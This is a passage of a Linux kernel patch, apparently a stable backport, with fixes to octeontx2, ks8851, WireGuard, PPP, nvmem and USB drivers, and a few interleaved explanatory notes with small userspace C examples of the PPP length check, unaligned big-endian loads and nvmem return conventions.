++#define NIX_FLOW_KEY_TYPE_L3_L4_MASK (~(0xf << 28))
++
+ struct nix_rss_flowkey_cfg {
+ 	struct mbox_msghdr hdr;
+ 	int	mcam_index;  /* MCAM entry index to modify */
+@@ -1109,6 +1111,10 @@ struct nix_rss_flowkey_cfg {
+ #define NIX_FLOW_KEY_TYPE_IPV4_PROTO	BIT(21)
+ #define NIX_FLOW_KEY_TYPE_AH		BIT(22)
+ #define NIX_FLOW_KEY_TYPE_ESP		BIT(23)
++#define NIX_FLOW_KEY_TYPE_L4_DST_ONLY BIT(28)
++#define NIX_FLOW_KEY_TYPE_L4_SRC_ONLY BIT(29)
++#define NIX_FLOW_KEY_TYPE_L3_DST_ONLY BIT(30)
++#define NIX_FLOW_KEY_TYPE_L3_SRC_ONLY BIT(31)
+ 	u32	flowkey_cfg; /* Flowkey types selected */
+ 	u8	group;       /* RSS context or group */
+ };
+@@ -1627,7 +1633,9 @@ struct cpt_lf_alloc_req_msg {
+ 	u16 nix_pf_func;
+ 	u16 sso_pf_func;
+ 	u16 eng_grpmsk;
+-	int blkaddr;
++	u8 blkaddr;
++	u8 ctx_ilen_valid : 1;
++	u8 ctx_ilen : 7;
+ };
+ 
+ #define CPT_INLINE_INBOUND      0
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/npc.h b/drivers/net/ethernet/marvell/octeontx2/af/npc.h
+index aaff91bc7415a..32a9425a2b1ea 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/npc.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/npc.h
+@@ -63,8 +63,13 @@ enum npc_kpu_lb_ltype {
+ 	NPC_LT_LB_CUSTOM1 = 0xF,
+ };
+ 
++/* Don't modify ltypes up to IP6_EXT, otherwise length and checksum of IP
++ * headers may not be checked correctly. IPv4 ltypes and IPv6 ltypes must
++ * differ only at bit 0 so mask 0xE can be used to detect extended headers.
++ */
+ enum npc_kpu_lc_ltype {
+-	NPC_LT_LC_IP = 1,
++	NPC_LT_LC_PTP = 1,
++	NPC_LT_LC_IP,
+ 	NPC_LT_LC_IP_OPT,
+ 	NPC_LT_LC_IP6,
+ 	NPC_LT_LC_IP6_EXT,
+@@ -72,7 +77,6 @@ enum npc_kpu_lc_ltype {
+ 	NPC_LT_LC_RARP,
+ 	NPC_LT_LC_MPLS,
+ 	NPC_LT_LC_NSH,
+-	NPC_LT_LC_PTP,
+ 	NPC_LT_LC_FCOE,
+ 	NPC_LT_LC_NGIO,
+ 	NPC_LT_LC_CUSTOM0 = 0xE,
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+index a7034b47ed6c9..c7829265eade9 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+@@ -1638,7 +1638,7 @@ static int rvu_check_rsrc_availability(struct rvu *rvu,
+ 		if (req->ssow > block->lf.max) {
+ 			dev_err(&rvu->pdev->dev,
+ 				"Func 0x%x: Invalid SSOW req, %d > max %d\n",
+-				 pcifunc, req->sso, block->lf.max);
++				 pcifunc, req->ssow, block->lf.max);
+ 			return -EINVAL;
+ 		}
+ 		mappedlfs = rvu_get_rsrc_mapcount(pfvf, block->addr);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c
+index 6fb02b93c1718..b226a4d376aab 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c
+@@ -17,7 +17,7 @@
+ #define	PCI_DEVID_OTX2_CPT10K_PF 0xA0F2
+ 
+ /* Length of initial context fetch in 128 byte words */
+-#define CPT_CTX_ILEN    2ULL
++#define CPT_CTX_ILEN    1ULL
+ 
+ #define cpt_get_eng_sts(e_min, e_max, rsp, etype)                   \
+ ({                                                                  \
+@@ -429,8 +429,12 @@ int rvu_mbox_handler_cpt_lf_alloc(struct rvu *rvu,
+ 
+ 		/* Set CPT LF group and priority */
+ 		val = (u64)req->eng_grpmsk << 48 | 1;
+-		if (!is_rvu_otx2(rvu))
+-			val |= (CPT_CTX_ILEN << 17);
++		if (!is_rvu_otx2(rvu)) {
++			if (req->ctx_ilen_valid)
++				val |= (req->ctx_ilen << 17);
++			else
++				val |= (CPT_CTX_ILEN << 17);
++		}
+ 
+ 		rvu_write64(rvu, blkaddr, CPT_AF_LFX_CTL(cptlf), val);
+ 
+@@ -692,7 +696,8 @@ int rvu_mbox_handler_cpt_rd_wr_register(struct rvu *rvu,
+ 					struct cpt_rd_wr_reg_msg *req,
+ 					struct cpt_rd_wr_reg_msg *rsp)
+ {
+-	int blkaddr;
++	u64 offset = req->reg_offset;
++	int blkaddr, lf;
+ 
+ 	blkaddr = validate_and_get_cpt_blkaddr(req->blkaddr);
+ 	if (blkaddr < 0)
+@@ -703,17 +708,25 @@ int rvu_mbox_handler_cpt_rd_wr_register(struct rvu *rvu,
+ 	    !is_cpt_vf(rvu, req->hdr.pcifunc))
+ 		return CPT_AF_ERR_ACCESS_DENIED;
+ 
+-	rsp->reg_offset = req->reg_offset;
+-	rsp->ret_val = req->ret_val;
+-	rsp->is_write = req->is_write;
+-
+ 	if (!is_valid_offset(rvu, req))
+ 		return CPT_AF_ERR_ACCESS_DENIED;
+ 
++	/* Translate local LF used by VFs to global CPT LF */
++	lf = rvu_get_lf(rvu, &rvu->hw->block[blkaddr], req->hdr.pcifunc,
++			(offset & 0xFFF) >> 3);
++
++	/* Translate local LF's offset to global CPT LF's offset */
++	offset &= 0xFF000;
++	offset += lf << 3;
++
++	rsp->reg_offset = offset;
++	rsp->ret_val = req->ret_val;
++	rsp->is_write = req->is_write;
++
+ 	if (req->is_write)
+-		rvu_write64(rvu, blkaddr, req->reg_offset, req->val);
++		rvu_write64(rvu, blkaddr, offset, req->val);
+ 	else
+-		rsp->val = rvu_read64(rvu, blkaddr, req->reg_offset);
++		rsp->val = rvu_read64(rvu, blkaddr, offset);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index 67080d5053e07..ef526408b0bd2 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -3354,6 +3354,11 @@ static int get_flowkey_alg_idx(struct nix_hw *nix_hw, u32 flow_cfg)
+ 	return -ERANGE;
+ }
+ 
++/* Mask to match ipv6(NPC_LT_LC_IP6) and ipv6 ext(NPC_LT_LC_IP6_EXT) */
++#define NPC_LT_LC_IP6_MATCH_MSK ((~(NPC_LT_LC_IP6 ^ NPC_LT_LC_IP6_EXT)) & 0xf)
++/* Mask to match both ipv4(NPC_LT_LC_IP) and ipv4 ext(NPC_LT_LC_IP_OPT) */
++#define NPC_LT_LC_IP_MATCH_MSK  ((~(NPC_LT_LC_IP ^ NPC_LT_LC_IP_OPT)) & 0xf)
++
+ static int set_flowkey_fields(struct nix_rx_flowkey_alg *alg, u32 flow_cfg)
+ {
+ 	int idx, nr_field, key_off, field_marker, keyoff_marker;
+@@ -3361,6 +3366,7 @@ static int set_flowkey_fields(struct nix_rx_flowkey_alg *alg, u32 flow_cfg)
+ 	struct nix_rx_flowkey_alg *field;
+ 	struct nix_rx_flowkey_alg tmp;
+ 	u32 key_type, valid_key;
++	u32 l3_l4_src_dst;
+ 	int l4_key_offset = 0;
+ 
+ 	if (!alg)
+@@ -3388,6 +3394,15 @@ static int set_flowkey_fields(struct nix_rx_flowkey_alg *alg, u32 flow_cfg)
+ 	 * group_member - Enabled when protocol is part of a group.
+ 	 */
+ 
++	/* Last 4 bits (31:28) are reserved to specify SRC, DST
++	 * selection for L3, L4 i.e IPV[4,6]_SRC, IPV[4,6]_DST,
++	 * [TCP,UDP,SCTP]_SRC, [TCP,UDP,SCTP]_DST
++	 * 31 => L3_SRC, 30 => L3_DST, 29 => L4_SRC, 28 => L4_DST
++	 */
++	l3_l4_src_dst = flow_cfg;
++	/* Reset these 4 bits, so that these won't be part of key */
++	flow_cfg &= NIX_FLOW_KEY_TYPE_L3_L4_MASK;
++
+ 	keyoff_marker = 0; max_key_off = 0; group_member = 0;
+ 	nr_field = 0; key_off = 0; field_marker = 1;
+ 	field = &tmp; max_bit_pos = fls(flow_cfg);
+@@ -3413,7 +3428,7 @@ static int set_flowkey_fields(struct nix_rx_flowkey_alg *alg, u32 flow_cfg)
+ 			field->hdr_offset = 9; /* offset */
+ 			field->bytesm1 = 0; /* 1 byte */
+ 			field->ltype_match = NPC_LT_LC_IP;
+-			field->ltype_mask = 0xF;
++			field->ltype_mask = NPC_LT_LC_IP_MATCH_MSK;
+ 			break;
+ 		case NIX_FLOW_KEY_TYPE_IPV4:
+ 		case NIX_FLOW_KEY_TYPE_INNR_IPV4:
+@@ -3425,7 +3440,22 @@ static int set_flowkey_fields(struct nix_rx_flowkey_alg *alg, u32 flow_cfg)
+ 			}
+ 			field->hdr_offset = 12; /* SIP offset */
+ 			field->bytesm1 = 7; /* SIP + DIP, 8 bytes */
+-			field->ltype_mask = 0xF; /* Match only IPv4 */
++
++			/* Only SIP */
++			if (l3_l4_src_dst & NIX_FLOW_KEY_TYPE_L3_SRC_ONLY)
++				field->bytesm1 = 3; /* SIP, 4 bytes */
++
++			if (l3_l4_src_dst & NIX_FLOW_KEY_TYPE_L3_DST_ONLY) {
++				/* Both SIP + DIP */
++				if (field->bytesm1 == 3) {
++					field->bytesm1 = 7; /* SIP + DIP, 8B */
++				} else {
++					/* Only DIP */
++					field->hdr_offset = 16; /* DIP off */
++					field->bytesm1 = 3; /* DIP, 4 bytes */
++				}
++			}
++			field->ltype_mask = NPC_LT_LC_IP_MATCH_MSK;
+ 			keyoff_marker = false;
+ 			break;
+ 		case NIX_FLOW_KEY_TYPE_IPV6:
+@@ -3438,7 +3468,23 @@ static int set_flowkey_fields(struct nix_rx_flowkey_alg *alg, u32 flow_cfg)
+ 			}
+ 			field->hdr_offset = 8; /* SIP offset */
+ 			field->bytesm1 = 31; /* SIP + DIP, 32 bytes */
+-			field->ltype_mask = 0xF; /* Match only IPv6 */
++
++			/* Only SIP */
++			if (l3_l4_src_dst & NIX_FLOW_KEY_TYPE_L3_SRC_ONLY)
++				field->bytesm1 = 15; /* SIP, 16 bytes */
++
++			if (l3_l4_src_dst & NIX_FLOW_KEY_TYPE_L3_DST_ONLY) {
++				/* Both SIP + DIP */
++				if (field->bytesm1 == 15) {
++					/* SIP + DIP, 32 bytes */
++					field->bytesm1 = 31;
++				} else {
++					/* Only DIP */
++					field->hdr_offset = 24; /* DIP off */
++					field->bytesm1 = 15; /* DIP,16 bytes */
++				}
++			}
++			field->ltype_mask = NPC_LT_LC_IP6_MATCH_MSK;
+ 			break;
+ 		case NIX_FLOW_KEY_TYPE_TCP:
+ 		case NIX_FLOW_KEY_TYPE_UDP:
+@@ -3453,6 +3499,21 @@ static int set_flowkey_fields(struct nix_rx_flowkey_alg *alg, u32 flow_cfg)
+ 				field->lid = NPC_LID_LH;
+ 			field->bytesm1 = 3; /* Sport + Dport, 4 bytes */
+ 
++			if (l3_l4_src_dst & NIX_FLOW_KEY_TYPE_L4_SRC_ONLY)
++				field->bytesm1 = 1; /* SRC, 2 bytes */
++
++			if (l3_l4_src_dst & NIX_FLOW_KEY_TYPE_L4_DST_ONLY) {
++				/* Both SRC + DST */
++				if (field->bytesm1 == 1) {
++					/* SRC + DST, 4 bytes */
++					field->bytesm1 = 3;
++				} else {
++					/* Only DIP */
++					field->hdr_offset = 2; /* DST off */
++					field->bytesm1 = 1; /* DST, 2 bytes */
++				}
++			}
++
+ 			/* Enum values for NPC_LID_LD and NPC_LID_LG are same,
+ 			 * so no need to change the ltype_match, just change
+ 			 * the lid for inner protocols
+diff --git a/drivers/net/ethernet/mediatek/mtk_star_emac.c b/drivers/net/ethernet/mediatek/mtk_star_emac.c
+index 7050351250b7a..ad27749c0931c 100644
+--- a/drivers/net/ethernet/mediatek/mtk_star_emac.c
++++ b/drivers/net/ethernet/mediatek/mtk_star_emac.c
+@@ -1531,6 +1531,7 @@ static int mtk_star_probe(struct platform_device *pdev)
+ {
+ 	struct device_node *of_node;
+ 	struct mtk_star_priv *priv;
++	struct phy_device *phydev;
+ 	struct net_device *ndev;
+ 	struct device *dev;
+ 	void __iomem *base;
+@@ -1656,6 +1657,12 @@ static int mtk_star_probe(struct platform_device *pdev)
+ 	netif_napi_add(ndev, &priv->rx_napi, mtk_star_rx_poll);
+ 	netif_napi_add_tx(ndev, &priv->tx_napi, mtk_star_tx_poll);
+ 
++	phydev = of_phy_find_device(priv->phy_node);
++	if (phydev) {
++		phydev->mac_managed_pm = true;
++		put_device(&phydev->mdio.dev);
++	}
++
+ 	return devm_register_netdev(dev, ndev);
+ }
+ 
+diff --git a/drivers/net/ethernet/micrel/ks8851_common.c b/drivers/net/ethernet/micrel/ks8851_common.c
+index 6453c92f0fa7c..7fa1820db9cce 100644
+--- a/drivers/net/ethernet/micrel/ks8851_common.c
++++ b/drivers/net/ethernet/micrel/ks8851_common.c
+@@ -352,11 +352,11 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ 		netif_dbg(ks, intr, ks->netdev,
+ 			  "%s: txspace %d\n", __func__, tx_space);
+ 
+-		spin_lock(&ks->statelock);
++		spin_lock_bh(&ks->statelock);
+ 		ks->tx_space = tx_space;
+ 		if (netif_queue_stopped(ks->netdev))
+ 			netif_wake_queue(ks->netdev);
+-		spin_unlock(&ks->statelock);
++		spin_unlock_bh(&ks->statelock);
+ 	}
+ 
+ 	if (status & IRQ_SPIBEI) {
+@@ -482,6 +482,7 @@ static int ks8851_net_open(struct net_device *dev)
+ 	ks8851_wrreg16(ks, KS_IER, ks->rc_ier);
+ 
+ 	ks->queued_len = 0;
++	ks->tx_space = ks8851_rdreg16(ks, KS_TXMIR);
+ 	netif_start_queue(ks->netdev);
+ 
+ 	netif_dbg(ks, ifup, ks->netdev, "network device up\n");
+@@ -635,14 +636,14 @@ static void ks8851_set_rx_mode(struct net_device *dev)
+ 
+ 	/* schedule work to do the actual set of the data if needed */
+ 
+-	spin_lock(&ks->statelock);
++	spin_lock_bh(&ks->statelock);
+ 
+ 	if (memcmp(&rxctrl, &ks->rxctrl, sizeof(rxctrl)) != 0) {
+ 		memcpy(&ks->rxctrl, &rxctrl, sizeof(ks->rxctrl));
+ 		schedule_work(&ks->rxctrl_work);
+ 	}
+ 
+-	spin_unlock(&ks->statelock);
++	spin_unlock_bh(&ks->statelock);
+ }
+ 
+ static int ks8851_set_mac_address(struct net_device *dev, void *addr)
+@@ -1101,7 +1102,6 @@ int ks8851_probe_common(struct net_device *netdev, struct device *dev,
+ 	int ret;
+ 
+ 	ks->netdev = netdev;
+-	ks->tx_space = 6144;
+ 
+ 	ks->gpio = devm_gpiod_get_optional(dev, "reset", GPIOD_OUT_HIGH);
+ 	ret = PTR_ERR_OR_ZERO(ks->gpio);
+diff --git a/drivers/net/ethernet/micrel/ks8851_spi.c b/drivers/net/ethernet/micrel/ks8851_spi.c
+index 4dcbff789b19d..e33a5e7beb39e 100644
+--- a/drivers/net/ethernet/micrel/ks8851_spi.c
++++ b/drivers/net/ethernet/micrel/ks8851_spi.c
+@@ -340,10 +340,10 @@ static void ks8851_tx_work(struct work_struct *work)
+ 
+ 	tx_space = ks8851_rdreg16_spi(ks, KS_TXMIR);
+ 
+-	spin_lock(&ks->statelock);
++	spin_lock_bh(&ks->statelock);
+ 	ks->queued_len -= dequeued_len;
+ 	ks->tx_space = tx_space;
+-	spin_unlock(&ks->statelock);
++	spin_unlock_bh(&ks->statelock);
+ 
+ 	ks8851_unlock_spi(ks, &flags);
+ }
+diff --git a/drivers/net/phy/microchip_t1.c b/drivers/net/phy/microchip_t1.c
+index 8569a545e0a3f..9517243e3051e 100644
+--- a/drivers/net/phy/microchip_t1.c
++++ b/drivers/net/phy/microchip_t1.c
+@@ -711,7 +711,7 @@ static int lan87xx_cable_test_report(struct phy_device *phydev)
+ 	ethnl_cable_test_result(phydev, ETHTOOL_A_CABLE_PAIR_A,
+ 				lan87xx_cable_test_report_trans(detect));
+ 
+-	return 0;
++	return phy_init_hw(phydev);
+ }
+ 
+ static int lan87xx_cable_test_get_status(struct phy_device *phydev,
+diff --git a/drivers/net/ppp/ppp_generic.c b/drivers/net/ppp/ppp_generic.c
+index 1d71f5276241c..5a6fa566e722f 100644
+--- a/drivers/net/ppp/ppp_generic.c
++++ b/drivers/net/ppp/ppp_generic.c
+@@ -70,6 +70,7 @@
+ #define MPHDRLEN_SSN	4	/* ditto with short sequence numbers */
+ 
+ #define PPP_PROTO_LEN	2
++#define PPP_LCP_HDRLEN	4
+ 
+ /*
+  * An instance of /dev/ppp can be associated with either a ppp
+@@ -491,6 +492,15 @@ static ssize_t ppp_read(struct file *file, char __user *buf,
+ 	return ret;
+ }
+ 
++static bool ppp_check_packet(struct sk_buff *skb, size_t count)
++{
++	/* LCP packets must include the LCP header, which is 4 bytes long:
++	 * 1-byte code, 1-byte identifier, and 2-byte length.
++	 */
++	return get_unaligned_be16(skb->data) != PPP_LCP ||
++		count >= PPP_PROTO_LEN + PPP_LCP_HDRLEN;
++}
++
+ static ssize_t ppp_write(struct file *file, const char __user *buf,
+ 			 size_t count, loff_t *ppos)
+ {
+@@ -513,6 +523,11 @@ static ssize_t ppp_write(struct file *file, const char __user *buf,
+ 		kfree_skb(skb);
+ 		goto out;
+ 	}
++	ret = -EINVAL;
++	if (unlikely(!ppp_check_packet(skb, count))) {
++		kfree_skb(skb);
++		goto out;
++	}
+ 
+ 	switch (pf->kind) {
+ 	case INTERFACE:
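The new ppp_check_packet() above rejects LCP frames too short to carry
the 4-byte code/identifier/length header. A minimal userspace model of
the same check, assuming the usual on-wire layout of a 2-byte protocol
field followed by the LCP header; the constants mirror the patch, and
the caller is assumed to have verified count >= PPP_PROTO_LEN first,
as the kernel does:

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define PPP_PROTO_LEN	2
#define PPP_LCP_HDRLEN	4
#define PPP_LCP		0xc021

static bool ppp_frame_ok(const uint8_t *data, size_t count)
{
	uint16_t proto = (uint16_t)(data[0] << 8 | data[1]);	/* big-endian */

	/* non-LCP frames pass; LCP frames need the full header */
	return proto != PPP_LCP || count >= PPP_PROTO_LEN + PPP_LCP_HDRLEN;
}

int main(void)
{
	uint8_t runt[3] = { 0xc0, 0x21, 0x01 };			/* truncated LCP */
	uint8_t ok[6]   = { 0xc0, 0x21, 0x01, 0x01, 0x00, 0x04 };

	printf("runt: %d  ok: %d\n",
	       ppp_frame_ok(runt, sizeof(runt)), ppp_frame_ok(ok, sizeof(ok)));
	return 0;
}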
+diff --git a/drivers/net/wireguard/allowedips.c b/drivers/net/wireguard/allowedips.c
+index 0ba714ca5185c..4b8528206cc8a 100644
+--- a/drivers/net/wireguard/allowedips.c
++++ b/drivers/net/wireguard/allowedips.c
+@@ -15,8 +15,8 @@ static void swap_endian(u8 *dst, const u8 *src, u8 bits)
+ 	if (bits == 32) {
+ 		*(u32 *)dst = be32_to_cpu(*(const __be32 *)src);
+ 	} else if (bits == 128) {
+-		((u64 *)dst)[0] = be64_to_cpu(((const __be64 *)src)[0]);
+-		((u64 *)dst)[1] = be64_to_cpu(((const __be64 *)src)[1]);
++		((u64 *)dst)[0] = get_unaligned_be64(src);
++		((u64 *)dst)[1] = get_unaligned_be64(src + 8);
+ 	}
+ }
+ 
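The allowedips change switches to get_unaligned_be64() because the key
bytes handed in may not be 8-byte aligned, and a direct __be64 load is
undefined behaviour on strict-alignment machines. A userspace
equivalent using memcpy() as the portable unaligned accessor (the byte
swap assumes a little-endian host):

#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint64_t load_be64(const uint8_t *src)
{
	uint64_t v;

	memcpy(&v, src, sizeof(v));	/* legal at any alignment */
	return __builtin_bswap64(v);	/* assumes a little-endian host */
}

int main(void)
{
	uint8_t buf[9] = { 0, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08 };

	/* buf + 1 is deliberately misaligned */
	printf("%016llx\n", (unsigned long long)load_be64(buf + 1));
	return 0;
}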
+diff --git a/drivers/net/wireguard/queueing.h b/drivers/net/wireguard/queueing.h
+index 1d4f9196bfe17..3ce70db9dd3fe 100644
+--- a/drivers/net/wireguard/queueing.h
++++ b/drivers/net/wireguard/queueing.h
+@@ -124,10 +124,10 @@ static inline int wg_cpumask_choose_online(int *stored_cpu, unsigned int id)
+  */
+ static inline int wg_cpumask_next_online(int *last_cpu)
+ {
+-	int cpu = cpumask_next(*last_cpu, cpu_online_mask);
++	int cpu = cpumask_next(READ_ONCE(*last_cpu), cpu_online_mask);
+ 	if (cpu >= nr_cpu_ids)
+ 		cpu = cpumask_first(cpu_online_mask);
+-	*last_cpu = cpu;
++	WRITE_ONCE(*last_cpu, cpu);
+ 	return cpu;
+ }
+ 
+diff --git a/drivers/net/wireguard/send.c b/drivers/net/wireguard/send.c
+index 0d48e0f4a1ba3..26e09c30d596c 100644
+--- a/drivers/net/wireguard/send.c
++++ b/drivers/net/wireguard/send.c
+@@ -222,7 +222,7 @@ void wg_packet_send_keepalive(struct wg_peer *peer)
+ {
+ 	struct sk_buff *skb;
+ 
+-	if (skb_queue_empty(&peer->staged_packet_queue)) {
++	if (skb_queue_empty_lockless(&peer->staged_packet_queue)) {
+ 		skb = alloc_skb(DATA_PACKET_HEAD_ROOM + MESSAGE_MINIMUM_LENGTH,
+ 				GFP_ATOMIC);
+ 		if (unlikely(!skb))
+diff --git a/drivers/nvmem/core.c b/drivers/nvmem/core.c
+index 34ee9d36ee7ba..f060583941027 100644
+--- a/drivers/nvmem/core.c
++++ b/drivers/nvmem/core.c
+@@ -367,10 +367,9 @@ static int nvmem_sysfs_setup_compat(struct nvmem_device *nvmem,
+ 	if (!config->base_dev)
+ 		return -EINVAL;
+ 
+-	if (config->type == NVMEM_TYPE_FRAM)
+-		bin_attr_nvmem_eeprom_compat.attr.name = "fram";
+-
+ 	nvmem->eeprom = bin_attr_nvmem_eeprom_compat;
++	if (config->type == NVMEM_TYPE_FRAM)
++		nvmem->eeprom.attr.name = "fram";
+ 	nvmem->eeprom.attr.mode = nvmem_bin_attr_get_umode(nvmem);
+ 	nvmem->eeprom.size = nvmem->size;
+ #ifdef CONFIG_DEBUG_LOCK_ALLOC
+diff --git a/drivers/nvmem/meson-efuse.c b/drivers/nvmem/meson-efuse.c
+index ba2714bef8d0e..cf1b249e67ca2 100644
+--- a/drivers/nvmem/meson-efuse.c
++++ b/drivers/nvmem/meson-efuse.c
+@@ -18,18 +18,24 @@ static int meson_efuse_read(void *context, unsigned int offset,
+ 			    void *val, size_t bytes)
+ {
+ 	struct meson_sm_firmware *fw = context;
++	int ret;
+ 
+-	return meson_sm_call_read(fw, (u8 *)val, bytes, SM_EFUSE_READ, offset,
+-				  bytes, 0, 0, 0);
++	ret = meson_sm_call_read(fw, (u8 *)val, bytes, SM_EFUSE_READ, offset,
++				 bytes, 0, 0, 0);
++
++	return ret < 0 ? ret : 0;
+ }
+ 
+ static int meson_efuse_write(void *context, unsigned int offset,
+ 			     void *val, size_t bytes)
+ {
+ 	struct meson_sm_firmware *fw = context;
++	int ret;
++
++	ret = meson_sm_call_write(fw, (u8 *)val, bytes, SM_EFUSE_WRITE, offset,
++				  bytes, 0, 0, 0);
+ 
+-	return meson_sm_call_write(fw, (u8 *)val, bytes, SM_EFUSE_WRITE, offset,
+-				   bytes, 0, 0, 0);
++	return ret < 0 ? ret : 0;
+ }
+ 
+ static const struct of_device_id meson_efuse_match[] = {
+diff --git a/drivers/nvmem/rmem.c b/drivers/nvmem/rmem.c
+index 752d0bf4445ee..7f907c5a445e7 100644
+--- a/drivers/nvmem/rmem.c
++++ b/drivers/nvmem/rmem.c
+@@ -46,7 +46,10 @@ static int rmem_read(void *context, unsigned int offset,
+ 
+ 	memunmap(addr);
+ 
+-	return count;
++	if (count < 0)
++		return count;
++
++	return count == bytes ? 0 : -EIO;
+ }
+ 
+ static int rmem_probe(struct platform_device *pdev)
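The meson-efuse and rmem fixes above share one theme: nvmem
reg_read/reg_write callbacks must return 0 on success or a negative
errno, not a byte count. As an isolated sketch, the adaptation looks
like this (the helper name is hypothetical):

#include <errno.h>
#include <stdio.h>

/* Map "bytes done, or negative errno" onto the nvmem convention. */
static int to_nvmem_ret(long done, long requested)
{
	if (done < 0)
		return (int)done;		/* propagate the errno */
	return done == requested ? 0 : -EIO;	/* short transfer is an error */
}

int main(void)
{
	printf("%d %d %d\n", to_nvmem_ret(16, 16),
	       to_nvmem_ret(8, 16), to_nvmem_ret(-ENODEV, 16));
	return 0;
}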
+diff --git a/drivers/platform/x86/toshiba_acpi.c b/drivers/platform/x86/toshiba_acpi.c
+index 1a8cb8eb22829..033e28aaeea63 100644
+--- a/drivers/platform/x86/toshiba_acpi.c
++++ b/drivers/platform/x86/toshiba_acpi.c
+@@ -3305,6 +3305,7 @@ static const struct dmi_system_id toshiba_dmi_quirks[] __initconst = {
+ 		},
+ 	 .driver_data = (void *)(QUIRK_TURN_ON_PANEL_ON_RESUME | QUIRK_HCI_HOTKEY_QUICKSTART),
+ 	},
++	{ }
+ };
+ 
+ static int toshiba_acpi_add(struct acpi_device *acpi_dev)
+diff --git a/drivers/usb/core/config.c b/drivers/usb/core/config.c
+index d396ac8b9cedd..15613b183fbd0 100644
+--- a/drivers/usb/core/config.c
++++ b/drivers/usb/core/config.c
+@@ -291,6 +291,20 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 	if (ifp->desc.bNumEndpoints >= num_ep)
+ 		goto skip_to_next_endpoint_or_interface_descriptor;
+ 
++	/* Save a copy of the descriptor and use it instead of the original */
++	endpoint = &ifp->endpoint[ifp->desc.bNumEndpoints];
++	memcpy(&endpoint->desc, d, n);
++	d = &endpoint->desc;
++
++	/* Clear the reserved bits in bEndpointAddress */
++	i = d->bEndpointAddress &
++			(USB_ENDPOINT_DIR_MASK | USB_ENDPOINT_NUMBER_MASK);
++	if (i != d->bEndpointAddress) {
++		dev_notice(ddev, "config %d interface %d altsetting %d has an endpoint descriptor with address 0x%X, changing to 0x%X\n",
++		    cfgno, inum, asnum, d->bEndpointAddress, i);
++		endpoint->desc.bEndpointAddress = i;
++	}
++
+ 	/* Check for duplicate endpoint addresses */
+ 	if (config_endpoint_is_duplicate(config, inum, asnum, d)) {
+ 		dev_notice(ddev, "config %d interface %d altsetting %d has a duplicate endpoint with address 0x%X, skipping\n",
+@@ -308,10 +322,8 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 		}
+ 	}
+ 
+-	endpoint = &ifp->endpoint[ifp->desc.bNumEndpoints];
++	/* Accept this endpoint */
+ 	++ifp->desc.bNumEndpoints;
+-
+-	memcpy(&endpoint->desc, d, n);
+ 	INIT_LIST_HEAD(&endpoint->urb_list);
+ 
+ 	/*
+diff --git a/drivers/usb/core/quirks.c b/drivers/usb/core/quirks.c
+index b4783574b8e66..13171454f9591 100644
+--- a/drivers/usb/core/quirks.c
++++ b/drivers/usb/core/quirks.c
+@@ -506,6 +506,9 @@ static const struct usb_device_id usb_quirk_list[] = {
+ 	{ USB_DEVICE(0x1b1c, 0x1b38), .driver_info = USB_QUIRK_DELAY_INIT |
+ 	  USB_QUIRK_DELAY_CTRL_MSG },
+ 
++	/* START BP-850k Printer */
++	{ USB_DEVICE(0x1bc3, 0x0003), .driver_info = USB_QUIRK_NO_SET_INTF },
++
+ 	/* MIDI keyboard WORLDE MINI */
+ 	{ USB_DEVICE(0x1c75, 0x0204), .driver_info =
+ 			USB_QUIRK_CONFIG_INTF_STRINGS },
+diff --git a/drivers/usb/gadget/configfs.c b/drivers/usb/gadget/configfs.c
+index b94aec6227c51..5c1c7f36e5442 100644
+--- a/drivers/usb/gadget/configfs.c
++++ b/drivers/usb/gadget/configfs.c
+@@ -105,9 +105,12 @@ static int usb_string_copy(const char *s, char **s_copy)
+ 	int ret;
+ 	char *str;
+ 	char *copy = *s_copy;
++
+ 	ret = strlen(s);
+ 	if (ret > USB_MAX_STRING_LEN)
+ 		return -EOVERFLOW;
++	if (ret < 1)
++		return -EINVAL;
+ 
+ 	if (copy) {
+ 		str = copy;
+diff --git a/drivers/usb/host/xhci.c b/drivers/usb/host/xhci.c
+index 27e01671d3865..505f45429c125 100644
+--- a/drivers/usb/host/xhci.c
++++ b/drivers/usb/host/xhci.c
+@@ -1247,10 +1247,20 @@ int xhci_resume(struct xhci_hcd *xhci, bool hibernated)
+ 			xhci_dbg(xhci, "Start the secondary HCD\n");
+ 			retval = xhci_run(xhci->shared_hcd);
+ 		}
+-
++		if (retval)
++			return retval;
++		/*
++		 * Resume roothubs unconditionally as PORTSC change bits are not
++		 * immediately visible after xHC reset
++		 */
+ 		hcd->state = HC_STATE_SUSPENDED;
+-		if (xhci->shared_hcd)
++
++		if (xhci->shared_hcd) {
+ 			xhci->shared_hcd->state = HC_STATE_SUSPENDED;
++			usb_hcd_resume_root_hub(xhci->shared_hcd);
++		}
++		usb_hcd_resume_root_hub(hcd);
++
+ 		goto done;
+ 	}
+ 
+@@ -1274,7 +1284,6 @@ int xhci_resume(struct xhci_hcd *xhci, bool hibernated)
+ 
+ 	xhci_dbc_resume(xhci);
+ 
+- done:
+ 	if (retval == 0) {
+ 		/*
+ 		 * Resume roothubs only if there are pending events.
+@@ -1293,6 +1302,7 @@ int xhci_resume(struct xhci_hcd *xhci, bool hibernated)
